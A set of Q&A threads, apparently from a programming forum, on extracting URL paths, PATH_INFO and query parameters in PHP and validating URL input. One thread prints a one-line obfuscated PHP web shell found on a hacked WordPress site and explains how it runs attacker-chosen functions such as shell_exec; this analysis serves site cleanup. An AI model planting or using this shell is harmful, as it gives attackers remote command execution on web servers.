get the '/foo' out of 'http://someplace.com/index.php/foo'

As far as I know, PHP has a function to get the '/foo/bar/' out of a URL like 'http://someplace.com/index.php/foo/bar/'.
I can't remember what the function is called.
[edit]
I remember using something like this in ExpressionEngine (see this), and later coming across an article explaining such a function built into PHP. However, I can't recall what it was.
[edit #2]
I know that there are functions to get the URL and several to manipulate it. However, I clearly remember that there was one function doing just this specific thing. Look at the ExpressionEngine example I linked to, to get a better understanding of what I mean.
[edit #3]
It wasn't ExpressionEngine I had used. It was CodeIgniter. But it's basically the same thing.
[edit #4]
Maybe I am wrong. I just remember coming across just such a function in an article once...
Case closed (unless someone stumbles upon just such a function).

I believe you are looking for parse_url.
print_r(parse_url('http://someplace.com/index.php/foo'));
/*
Array
(
[scheme] => http
[host] => someplace.com
[path] => /index.php/foo
)
*/
You can then manipulate the path item to remove /index.php.
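One way to do that manipulation, as a rough sketch: take the path from parse_url() and cut off everything up to and including the script name. The helper name pathAfterScript and the default '/index.php' are my own assumptions, not a built-in PHP function.

```php
<?php
// Hypothetical helper: returns the part of the URL path that follows the script name.
function pathAfterScript(string $url, string $script = '/index.php'): ?string
{
    $path = parse_url($url, PHP_URL_PATH);
    if (!is_string($path)) {
        return null; // malformed URL or no path component
    }
    $pos = strpos($path, $script);
    if ($pos === false) {
        return null; // script name does not occur in the path
    }
    return substr($path, $pos + strlen($script));
}

echo pathAfterScript('http://someplace.com/index.php/foo/bar/'), "\n";
```

This only works if you already know the script name; it cannot discover it for you.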

It's not a function. It's a variable: $_SERVER['PATH_INFO']

That's $_SERVER['PATH_INFO']. It may not be available on all systems, since it depends on the web server passing it on. In Apache, that's controlled by the AcceptPathInfo option.
response to gregoire:
It's impossible to pull out path_info from a url with 100% reliability unless it's being done on the webserver handling that url at the time - you cannot tell where the actual script part ends and the path_info starts, especially if the path is something like
/a/b/c/scriptishere/path/info
There's no '.html', or '.php', or '.aspx' or whatever to even give you a hint. As such, this is the only way to 100% reliably answer the OP's question. Anything else is a guess - even "index.php" in the OP's sample could be a directory and the actual script is 'foo'.
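A minimal sketch of reading it defensively, assuming the web server may or may not set the key. The helper name requestPathInfo is made up for illustration, and the server array is passed in as a parameter so the snippet can be tried from the command line; in a real request you would pass $_SERVER.

```php
<?php
// Hypothetical helper: returns PATH_INFO, or an empty string when the server did not pass it on.
function requestPathInfo(array $server): string
{
    return $server['PATH_INFO'] ?? '';
}

// Stand-in for $_SERVER during a request to /index.php/foo/bar/
$fakeServer = ['PATH_INFO' => '/foo/bar/'];

// Split into segments, dropping the empty strings produced by leading/trailing slashes.
$segments = array_values(array_filter(explode('/', requestPathInfo($fakeServer)), 'strlen'));
print_r($segments);
```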

If the string is always going to have index.php in it, why not just substr, like so:
$url = "http://someplace.com/index.php/foo/bar/";
$delim = 'index.php';
$path = substr($url,strpos($url,$delim)+strlen($delim));
That's a little verbose, but if you could clarify where this string is coming from and which parts are going to change, I could give a more concise answer.
You could also use regular expressions:
$matches = array();
preg_match('/index\.php\/(.*)$/', $url, $matches);
$matches will contain the captured part (everything after index.php/) in index 1; index 0 will be the full text matched by the pattern.
I didn't test that regex, but something like that should work.

Related

Can you accurately process a directory structure by URI alone?

Take the following complex URI (or path, what have you).
/directory/subdirectory/flashy-seo-directory/?query=123&complexvar=abc/123etc
Take this simpler one.
/directory/?query=123
What methodology would you use to accurately process the URI to separate the directory from the filename/query/etc?
I know how to do this in simple, expected, and typical case scenarios where everything is formatted "normally" or "favorably", but what I'd like to know is if the following example will accurately cover all possible valid directory names/structures/queries/etc. For example, I once saw a URI like this that I don't quite understand: /directory/index.php/something/?query=123. Not even sure what's going on there.
Methodology (not dependent on any specific programming language, though I am using PHP for this)
1. explode the entire URI by /, placing each bit in a neat array:
$bits = explode( '/', $uri );
2. Loop through each array item and determine(?) at what point we've "reached" the portion of the URI that is no longer directory structure
3. Note which array key is no longer directory structure and implode the prior keys to assemble the directory
--
My idea for Step 2 was basically to check that there are no query-specific characters (?, &, =). I haven't seen any directories with .s in them, but as you can see you can have a query variable such as ?q=abc/123, so simply checking for / wouldn't work. I've seen directories with the ~ symbol, so a simple [A-Za-z0-9-] regex might not work in every scenario. Wondering how Step 2 can be done accurately.
This is needed seeing as the URI can capture a "virtual directory" the script may be running under that doesn't actually exist anywhere, perhaps via .htaccess for SEO or what have you. And so needs to be properly and accurately "accounted for" in order to have robust and flexible functionality throughout.

If you are only interested in the path part, and there is no host involved, then you only need to split (explode) the string at the first valid URI path delimiter.
Valid delimiters: ; # ?
$uri = "/directory/flashy-seo-directory/?query=123&complexvar=abc/123etc";
foreach (str_split("#;?") as $dlm) {
$uri = str_contains($uri, $dlm) ? explode($dlm, $uri, 2)[0] : $uri;
}
echo($uri);
Result:
/directory/flashy-seo-directory/

I suppose you're looking for parse_url()
https://www.php.net/manual/en/function.parse-url
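As a rough sketch of how that looks for the relative URIs in the question: parse_url() separates the path from the query string, and parse_str() decodes the query. The helper name splitUri is hypothetical.

```php
<?php
// Hypothetical helper: returns [path, query parameters] for a URI, or null if it cannot be parsed.
function splitUri(string $uri): ?array
{
    $parts = parse_url($uri);
    if ($parts === false) {
        return null; // seriously malformed URI
    }
    parse_str($parts['query'] ?? '', $query); // decode the query string into an array
    return [$parts['path'] ?? '', $query];
}

[$path, $query] = splitUri('/directory/index.php/something/?query=123');
echo $path, "\n"; // /directory/index.php/something/
```

Note that this only separates path from query. Whether index.php in that path is a script followed by extra path info or just a directory name is something only the web server handling the request can tell.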

PHP filename parameter query

First of all I have checked the other suggested answers and I'm not certain whether they actually cover the question I've got. I'm very new to PHP so please forgive me if I am asking what sounds like a stupid question.
I have a php file which is called from another php file with a parameter
I understand how this works in the calling file.
I don't understand how to extract the parameter contents into a variable at the target end.
Let's say for a moment that in the address bar of the browser I get this:
targetfilename?parameter=Fred_hippy
I now want to pass "Fred" and "hippy" to a two-element array inside targetname.php. That's it, nothing else. (I said I was new to PHP.)
I think the way to do this is:
$file = substr($targetfilename, 13);
$name = explode("_", $file);
Is that correct please? If not could somebody tweak it please?
Thanks.

All parameters in the query string (everything after the ?) are available in the $_GET array; data sent in the body of a POST request ends up in $_POST. If you are typing into the address bar (as opposed to submitting a FORM with method POST) then it is always GET. PHP makes it really easy:
$parameter = $_GET['parameter'];
$name = explode("_",$parameter);
That leaves $name[0] = 'Fred' and $name[1] = 'hippy'.
In older versions of PHP, the $_GET to variable assignment was done automagically (the register_globals setting), which was very useful but also opened a lot of possible security issues, so it was deprecated in PHP 5.3 and removed in PHP 5.4.
Another note based on comments. An alternative to:
targetfilename?parameter=Fred_hippy
is
targetfilename?name=Fred&status=hippy
which would be read in PHP as:
$name = $_GET['name'];
$status = $_GET['status'];
with no explode() needed. Basically, PHP understands the standard protocol for sending parameters via GET & POST and takes care of a lot of the details for you.
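Since the parameter may be missing from the URL, here is a slightly more defensive sketch of the first variant. The helper name nameParts is made up, and the array is passed in so the snippet runs outside a web request; in targetfilename.php you would pass $_GET.

```php
<?php
// Hypothetical helper: splits ?parameter=Fred_hippy into ['Fred', 'hippy'].
function nameParts(array $get): array
{
    $parameter = $get['parameter'] ?? '';
    if (!is_string($parameter) || $parameter === '') {
        return []; // parameter missing, empty, or sent as an array
    }
    return explode('_', $parameter, 2); // at most two elements
}

print_r(nameParts(['parameter' => 'Fred_hippy']));
```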

What does this line of PHP code do?

I extracted this from a WordPress site that happened to be infected and that I am cleaning up.
<?php ($_=@$_GET[page]).@$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.

It's a PHP shell. If you rewrite it to read both values from GET (parameters 2 and 1 instead of page and 404), the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here

Let's break this up a little bit:
($_=@$_GET[page]) . @$_($_POST[404]);
First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = @$_GET[page], $_ is a variable that is being assigned the value of $_GET['page']. The @ suppresses the notice PHP would raise if that key is missing.
The second expression, @$_($_POST[404]);, starts off with error suppression @ and then calls $_ as a function: because the variable is followed by (, PHP calls the function whose name is stored in $_. The argument passed to this function is $_POST['404'], and the second parenthesis just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
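The mechanism being abused here is PHP's "variable functions" feature: a string followed by parentheses is called as the function of that name. A harmless sketch of it, plus an allow-list check of the kind legitimate code would need before dispatching on a name (the helper callAllowed is hypothetical):

```php
<?php
$fn = 'strtoupper';       // a plain string holding a function name
echo $fn('hello'), "\n";  // PHP calls strtoupper('hello')

// Hypothetical helper: only dispatch to names on an explicit allow-list.
function callAllowed(string $name, string $arg, array $allowed): ?string
{
    return in_array($name, $allowed, true) ? $name($arg) : null;
}

var_dump(callAllowed('strrev', 'abc', ['strrev', 'strtoupper']));     // allowed name
var_dump(callAllowed('shell_exec', 'abc', ['strrev', 'strtoupper'])); // rejected, returns null
```

The infected line has no such check, which is why whatever name arrives in the request gets called.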

How to deal with question mark in url in php single entry website

I'm dealing with two question marks in a single entry website.
I'm trying to use urlencode to handle it.
The original URL:
'search.php?query='.quote_replace(addmarks($search_results['did_you_mean'])).'&search=1'
I want to use it in the single entry website:
'index.php?page='.urlencode('search?query='.quote_replace(addmarks($search_results['did_you_mean'])).'&search=1')
It doesn't work, and I don't know if I must use urldecode and where I can use it also.

Why not just rewrite it to become
index.php?page=search&query=...
mod_rewrite will do this for you if you use the [QSA] (query string append) flag.
http://wiki.apache.org/httpd/RewriteQueryString

$_SERVER['QUERY_STRING'] will give you everything after the first "?" in a URL.
From here you can parse using "explode" or common string functions.
Example:
http://xxx/info.php?test=1?test=2&test=3
$_SERVER['QUERY_STRING'] =>test=1?test=2&test=3
list($localURL, $remoteURL) = explode("?", $_SERVER['QUERY_STRING']);
$localURL => 'test=1'
$remoteURL => 'test=2&test=3'
Hope this helps

I would suggest changing the logic of the server code to handle a simpler query form. The current approach is probably going to lead you nowhere in the very near future.
Use
index.php?page=search&query=...
as your query format, but do not rewrite it with mod_rewrite into your first wanted format just to satisfy your current application logic; handle it with some better logic on the server side instead. Write some ifs and thens, switches and cases ... but do not try to put the logic of the application into your URLs. It will give you really awkward URLs, and soon you'll see that there is not a lot of room in that layer to handle all the logic you will need. :)
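A minimal sketch of building that flat format with http_build_query(), which takes care of the URL encoding for each value. Here $suggestion is only a stand-in for the quote_replace(addmarks(...)) value from the question.

```php
<?php
// Stand-in for quote_replace(addmarks($search_results['did_you_mean'])) from the question.
$suggestion = 'what is php?';

$url = 'index.php?' . http_build_query([
    'page'   => 'search',
    'query'  => $suggestion,
    'search' => 1,
]);
echo $url, "\n";

// On the receiving side PHP decodes the values into $_GET; parse_str() mimics that here.
parse_str(parse_url($url, PHP_URL_QUERY), $params);
print_r($params);
```

With this layout index.php can switch on $_GET['page'] and read $_GET['query'] directly, with no manual urldecode call.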

PHP - securing parameters passed in the URL

I have an application which makes decisions based on part of URL:
if ( isset($this->params['url']['url']) ) {
$url = $this->params['url']['url'];
$url = explode('/',$url);
$id = $this->Provider->getProviderID($url[0]);
$this->providerName = $url[0]; //set the provider name
return $id;
}
This happens to be in a cake app, so $this->params['url'] contains an element of the URL. I then use that element of the URL to decide which data to use in the rest of my app. My question is...
What's the best way to secure this input so that people can't pass in anything nasty?
thanks,

Other comments here are correct, in AppController's beforeFilter validate the provider against the providers in your db.
However, if all URLs should be prefixed with a provider string, you are going about extracting it from the URL the wrong way by looking in $this->params['url'].
This kind of problem is exactly what the router class, and its ability to pass params to an action, is for. Check out the manual page in the cookbook http://book.cakephp.org/view/46/Routes-Configuration. You might try something like:
Router::connect('/:provider/:controller/:action');
You'll also see in the manual the ability to validate the provider param in the route itself by a regex - if you have a small definite list of known providers, you can hard code these in the route regex.
By setting up a route that captures this part of the URL it becomes instantly available in $this->params['provider'], but even better than that is the fact that the html helper link() method automatically builds correctly formatted URLs, e.g.
$html->link('label', array(
'controller' => 'xxx',
'action' => 'yyy',
'provider' => 'zzz'
));
This returns a link like /zzz/xxx/yyy

What are valid provider names? Test if the URL parameter is one, otherwise reject it.
Hopefully you're aware that there is absolutely no way to prevent the user from submitting absolutely anything, including provider names they're not supposed to use.

I'd re-iterate Karsten's comment: define "anything nasty"
What are you expecting the parameter to be? If you're expecting it to be a URL, use a regex to validate URLs. If you're expecting an integer, cast it to an integer. Same goes for a float, boolean, etc.
These PHP functions might be helpful though:
www.php.net/strip_tags
www.php.net/ctype_alpha

The parameter will be a providername - an alphanumeric string. I think the answer is basically to use ctype_alnum() (or ctype_alpha() if only letters are allowed) in combination with a check that the providername is a valid one, based on other application logic.
thanks for the replies
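Roughly what that combination could look like, as a sketch in plain PHP rather than anything CakePHP-specific. The helper name validProvider and the $allowed list are assumptions; in the real app the list would come from the providers in your database.

```php
<?php
// Hypothetical helper: returns the provider name from the URL if it is well-formed and known, else null.
function validProvider(string $url, array $allowed): ?string
{
    $segment = explode('/', $url)[0];
    if (!ctype_alnum($segment)) {
        return null; // empty, or contains characters outside A-Z, a-z, 0-9
    }
    // Strict comparison against the list of known providers.
    return in_array($segment, $allowed, true) ? $segment : null;
}

$allowed = ['acme', 'globex']; // assumed example data
var_dump(validProvider('acme/products/list', $allowed));
var_dump(validProvider('../etc/passwd', $allowed));
```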

Also, if you have a known set of allowable URLs, a good idea is to whitelist those allowed URLs. You could even do that dynamically by having a DB table that contains the allowed URLs -- pull that from the database, make a comparison to the URL parameter passed. Alternatively, you could whitelist patterns (say you have allowed domains that can be passed, but the rest of the url changes... You can whitelist the domain and/ or use regexps to determine validity).
At the very least, make sure you use strip_tags, or the built-in mysql escape sequences (if using PHP5, parameterizing your SQL queries solves these problems).

It would be more cake-like to use the Sanitize class. In this case Sanitize::escape() or Sanitize::paranoid() seem appropriate.
